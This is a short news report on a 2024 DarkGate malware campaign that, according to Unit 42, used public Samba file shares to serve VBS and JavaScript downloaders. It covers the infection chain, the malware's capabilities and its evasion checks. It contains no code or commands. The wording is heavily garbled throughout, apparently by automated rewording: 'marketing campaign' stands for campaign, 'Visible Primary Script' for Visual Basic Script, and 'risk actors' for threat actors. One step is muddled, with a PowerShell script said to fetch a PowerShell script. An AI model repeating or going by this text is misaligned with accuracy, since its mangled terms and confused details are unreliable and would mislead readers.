Cybersecurity researchers have make clear a short-lived DarkGate malware marketing campaign that leveraged Samba file shares to provoke the infections.
Palo Alto Networks Unit 42 mentioned the exercise spanned the months of March and April 2024, with the an infection chains utilizing servers working public-facing Samba file shares internet hosting Visible Primary Script (VBS) and JavaScript information. Targets included North America, Europe, and components of Asia.
“This was a comparatively short-lived marketing campaign that illustrates how risk actors can creatively abuse reputable instruments and companies to distribute their malware,” safety researchers Vishwa Thothathri, Yijie Sui, Anmol Maurya, Uday Pratap Singh, and Brad Duncan mentioned.
DarkGate, which first emerged in 2018, has advanced right into a malware-as-a-service (MaaS) providing utilized by a tightly managed variety of clients. It comes with capabilities to remotely management compromised hosts, execute code, mine cryptocurrency, launch reverse shells, and drop further payloads.
Assaults involving the malware have notably witnessed a surge in current months within the aftermath of the multinational legislation enforcement takedown of the QakBot infrastructure in August 2023.
The marketing campaign documented by Unit 42 commences with Microsoft Excel (.xlsx) information that, when opened, urge targets to click on on an embedded Open button, which, in flip, fetches and runs VBS code hosted on a Samba file share.
The PowerShell script is configured to retrieve and execute a PowerShell script, which is then used to obtain an AutoHotKey-based DarkGate bundle.
Alternate sequences utilizing JavaScript information as a substitute of VBS are not any completely different in that also they are engineered to obtain and run the follow-up PowerShell script.
DarkGate works by scanning for varied anti-malware packages and checking the CPU info to find out if it is working on a bodily host or a digital atmosphere, thereby permitting it to hinder evaluation. It additionally examines the host’s working processes to find out the presence of reverse engineering instruments, debuggers, or virtualization software program.
“DarkGate C2 site visitors makes use of unencrypted HTTP requests, however the knowledge is obfuscated and seems as Base64-encoded textual content,” the researchers mentioned.
“As DarkGate continues to evolve and refine its strategies of infiltration and resistance to evaluation, it stays a potent reminder of the necessity for strong and proactive cybersecurity defenses.”